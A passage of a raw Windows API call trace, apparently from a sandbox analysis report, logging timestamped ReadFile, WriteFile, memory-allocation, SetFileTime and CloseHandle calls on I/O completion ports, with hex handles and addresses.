returned 0x53fcc0 [0080.217] free (_Block=0x2062da0) [0080.217] free (_Block=0x53fcc0) [0080.217] free (_Block=0x2062eb8) [0080.217] WriteFile (in: hFile=0x3b4, lpBuffer=0x20abb14, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0080.218] GetLastError () returned 0x3e5 [0080.218] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0080.247] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0080.247] CloseHandle (hObject=0x3b0) returned 1 [0080.250] free (_Block=0x3940048) [0080.250] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0080.270] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0080.270] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0080.270] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0080.271] free (_Block=0x2060778) [0080.271] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0080.271] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0080.271] free (_Block=0x2062da0) [0080.272] free (_Block=0x53fcc0) [0080.272] free (_Block=0x2062eb8) [0080.272] WriteFile (in: hFile=0x3c4, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0080.273] GetLastError () returned 0x3e5 [0080.273] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0095.791] ReadFile (in: hFile=0x3d0, lpBuffer=0x20ebe14, nNumberOfBytesToRead=0xa20, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebde0 | out: lpBuffer=0x20ebe14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebde0) returned 1 [0095.792] GetLastError () returned 0x3e5 [0095.792] GetQueuedCompletionStatus (CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff) Thread: id = 11 os_tid = 0xfa0 [0072.121] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0076.731] ReadFile (in: hFile=0x3a0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x1028, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0076.747] GetLastError () returned 0x3e5 [0076.747] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0076.761] WriteFile (in: hFile=0x3a4, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0076.761] GetLastError () returned 0x3e5 [0076.761] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0077.315] ReadFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0077.315] GetLastError () returned 0x3e5 [0077.315] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0077.326] memcpy (in: _Dst=0x41cfdc, _Src=0x2b8f9a0, _Size=0x2 | out: _Dst=0x41cfdc) returned 0x41cfdc [0077.326] memcpy (in: _Dst=0x41cfde, _Src=0x2b8f96c, _Size=0x1e | out: _Dst=0x41cfde) returned 0x41cfde [0077.326] memcpy (in: _Dst=0x41cfbc, _Src=0x2b8f98a, _Size=0x2 | out: _Dst=0x41cfbc) returned 0x41cfbc [0077.326] memcpy (in: _Dst=0x41cfbc, _Src=0x2b8fa50, _Size=0x20 | out: _Dst=0x41cfbc) returned 0x41cfbc [0077.326] memcpy (in: _Dst=0x2b8f9e8, _Src=0x2b8fa50, _Size=0x20 | out: _Dst=0x2b8f9e8) returned 0x2b8f9e8 [0077.326] memcpy (in: _Dst=0x2b8fa9c, _Src=0x2b8fa50, _Size=0x20 | out: _Dst=0x2b8fa9c) returned 0x2b8fa9c [0077.326] memcpy (in: _Dst=0x2b8fabc, _Src=0x2b8fc70, _Size=0x10 | out: _Dst=0x2b8fabc) returned 0x2b8fabc [0077.326] memcpy (in: _Dst=0x2b8f890, _Src=0x2b8fa9c, _Size=0x30 | out: _Dst=0x2b8f890) returned 0x2b8f890 [0077.327] memcpy (in: _Dst=0x2b8fde8, _Src=0x41d198, _Size=0x0 | out: _Dst=0x2b8fde8) returned 0x2b8fde8 [0077.327] memcpy (in: _Dst=0x20ebb86, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb86) returned 0x20ebb86 [0077.327] memcpy (in: _Dst=0x20ebb87, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb87) returned 0x20ebb87 [0077.327] memcpy (in: _Dst=0x20ebb88, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb88) returned 0x20ebb88 [0077.327] memcpy (in: _Dst=0x20ebb89, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb89) returned 0x20ebb89 [0077.327] memcpy (in: _Dst=0x20ebb8a, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb8a) returned 0x20ebb8a [0077.328] memcpy (in: _Dst=0x20ebb8b, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb8b) returned 0x20ebb8b [0077.328] memcpy (in: _Dst=0x20ebb8c, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb8c) returned 0x20ebb8c [0077.328] memcpy (in: _Dst=0x20ebb8d, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb8d) returned 0x20ebb8d [0077.328] memcpy (in: _Dst=0x20ebb8e, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb8e) returned 0x20ebb8e [0077.328] memcpy (in: _Dst=0x20ebb8f, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb8f) returned 0x20ebb8f [0077.329] memcpy (in: _Dst=0x20ebb90, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb90) returned 0x20ebb90 [0077.329] memcpy (in: _Dst=0x20ebb91, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb91) returned 0x20ebb91 [0077.329] memcpy (in: _Dst=0x20ebb92, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb92) returned 0x20ebb92 [0077.329] memcpy (in: _Dst=0x20ebb93, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb93) returned 0x20ebb93 [0077.329] memcpy (in: _Dst=0x20ebb94, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb94) returned 0x20ebb94 [0077.329] memcpy (in: _Dst=0x20ebb95, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb95) returned 0x20ebb95 [0077.330] memcpy (in: _Dst=0x20ebb96, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb96) returned 0x20ebb96 [0077.330] memcpy (in: _Dst=0x20ebb97, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb97) returned 0x20ebb97 [0077.330] memcpy (in: _Dst=0x20ebb98, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb98) returned 0x20ebb98 [0077.330] memcpy (in: _Dst=0x20ebb99, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb99) returned 0x20ebb99 [0077.330] memcpy (in: _Dst=0x20ebb9a, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb9a) returned 0x20ebb9a [0077.330] memcpy (in: _Dst=0x20ebb9b, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb9b) returned 0x20ebb9b [0077.330] memcpy (in: _Dst=0x20ebb9c, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb9c) returned 0x20ebb9c [0077.330] memcpy (in: _Dst=0x20ebb9d, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb9d) returned 0x20ebb9d [0077.331] memcpy (in: _Dst=0x20ebb9e, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb9e) returned 0x20ebb9e [0077.331] memcpy (in: _Dst=0x20ebb9f, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebb9f) returned 0x20ebb9f [0077.331] memcpy (in: _Dst=0x20ebba0, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebba0) returned 0x20ebba0 [0077.331] memcpy (in: _Dst=0x20ebba1, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebba1) returned 0x20ebba1 [0077.331] memcpy (in: _Dst=0x20ebba2, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebba2) returned 0x20ebba2 [0077.331] memcpy (in: _Dst=0x20ebba3, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebba3) returned 0x20ebba3 [0077.331] memcpy (in: _Dst=0x20ebba4, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebba4) returned 0x20ebba4 [0077.331] memcpy (in: _Dst=0x20ebba5, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebba5) returned 0x20ebba5 [0077.332] memcpy (in: _Dst=0x20ebba6, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebba6) returned 0x20ebba6 [0077.332] memcpy (in: _Dst=0x20ebba7, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebba7) returned 0x20ebba7 [0077.332] memcpy (in: _Dst=0x20ebba8, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebba8) returned 0x20ebba8 [0077.332] memcpy (in: _Dst=0x20ebba9, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebba9) returned 0x20ebba9 [0077.332] memcpy (in: _Dst=0x20ebbaa, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebbaa) returned 0x20ebbaa [0077.332] memcpy (in: _Dst=0x20ebbab, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebbab) returned 0x20ebbab [0077.332] memcpy (in: _Dst=0x20ebbac, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebbac) returned 0x20ebbac [0077.332] memcpy (in: _Dst=0x20ebbad, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebbad) returned 0x20ebbad [0077.333] memcpy (in: _Dst=0x20ebbae, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebbae) returned 0x20ebbae [0077.333] memcpy (in: _Dst=0x20ebbaf, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebbaf) returned 0x20ebbaf [0077.333] memcpy (in: _Dst=0x20ebbb0, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebbb0) returned 0x20ebbb0 [0077.333] memcpy (in: _Dst=0x20ebbb1, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebbb1) returned 0x20ebbb1 [0077.333] memcpy (in: _Dst=0x20ebbb2, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebbb2) returned 0x20ebbb2 [0077.333] memcpy (in: _Dst=0x20ebbb3, _Src=0x2b8fbdc, _Size=0x1 | out: _Dst=0x20ebbb3) returned 0x20ebbb3 [0077.333] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0077.333] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0077.333] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.334] free (_Block=0x2060778) [0077.334] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0077.334] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0077.335] free (_Block=0x2062da0) [0077.336] free (_Block=0x53fcc0) [0077.336] free (_Block=0x2062eb8) [0077.336] WriteFile (in: hFile=0x3c0, lpBuffer=0x20ebb84*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebb50) returned 1 [0077.337] GetLastError () returned 0x3e5 [0077.337] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0080.273] SetFileTime (hFile=0x3b4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0080.273] CloseHandle (hObject=0x3b4) returned 1 [0080.280] free (_Block=0x20abae0) [0080.280] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0080.280] SetFileTime (hFile=0x3b8, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0080.280] CloseHandle (hObject=0x3b8) returned 1 [0080.283] free (_Block=0x206b860) [0080.283] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0080.284] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0080.409] CloseHandle (hObject=0x3c4) returned 1 [0080.414] free (_Block=0x3940048) [0080.414] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0080.615] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0080.615] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0080.615] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0080.616] free (_Block=0x2060778) [0080.616] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0080.616] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0080.617] free (_Block=0x2062da0) [0080.618] free (_Block=0x53fcc0) [0080.618] free (_Block=0x2062eb8) [0080.618] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0080.618] GetLastError () returned 0x3e5 [0080.619] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0080.649] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0080.650] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0080.650] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0080.650] free (_Block=0x2060778) [0080.650] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0080.650] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0080.652] free (_Block=0x2062da0) [0080.652] free (_Block=0x53fcc0) [0080.652] free (_Block=0x2062eb8) [0080.652] WriteFile (in: hFile=0x3b0, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0080.653] GetLastError () returned 0x3e5 [0080.653] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0080.681] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0080.681] CloseHandle (hObject=0x3c4) returned 1 [0080.684] free (_Block=0x206b860) [0080.684] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0080.690] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0080.691] CloseHandle (hObject=0x3b0) returned 1 [0080.694] free (_Block=0x3940048) [0080.694] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0080.704] ReadFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x2d7, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0080.704] GetLastError () returned 0x3e5 [0080.704] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0080.705] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0080.705] CloseHandle (hObject=0x3c0) returned 1 [0080.716] free (_Block=0x20abae0) [0080.716] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0080.976] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0080.976] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0080.976] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0080.976] free (_Block=0x2060778) [0080.976] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0080.976] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0080.977] free (_Block=0x2062da0) [0080.978] free (_Block=0x53fcc0) [0080.978] free (_Block=0x2062eb8) [0080.978] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0080.978] GetLastError () returned 0x3e5 [0080.978] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.002] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0081.002] GetLastError () returned 0x3e5 [0081.002] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.021] WriteFile (in: hFile=0x3b8, lpBuffer=0x20abb14, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0081.022] GetLastError () returned 0x3e5 [0081.022] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.050] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0xc59, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0081.050] GetLastError () returned 0x3e5 [0081.050] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.057] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0081.057] CloseHandle (hObject=0x3b0) returned 1 [0081.061] free (_Block=0x206b860) [0081.061] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.067] ReadFile (in: hFile=0x3b8, lpBuffer=0x20abb14, nNumberOfBytesToRead=0xc5e, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0081.067] GetLastError () returned 0x3e5 [0081.067] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.067] SetFileTime (hFile=0x3b8, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0081.067] CloseHandle (hObject=0x3b8) returned 1 [0081.070] free (_Block=0x20abae0) [0081.070] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.235] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0081.235] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0081.235] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0081.236] free (_Block=0x2060778) [0081.236] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0081.236] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0081.237] free (_Block=0x2062da0) [0081.237] free (_Block=0x53fcc0) [0081.238] free (_Block=0x2062eb8) [0081.238] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0081.238] GetLastError () returned 0x3e5 [0081.238] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.255] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0081.255] GetLastError () returned 0x3e5 [0081.255] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b8fc4c, lpCompletionKey=0x2b8fc5c, lpOverlapped=0x2b8fc58) returned 1 [0081.265] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0081.265] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0081.265] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0081.266] free (_Block=0x2060778) [0081.266] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0081.266] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0081.267] free (_Block=0x2062da0) [0081.267] free 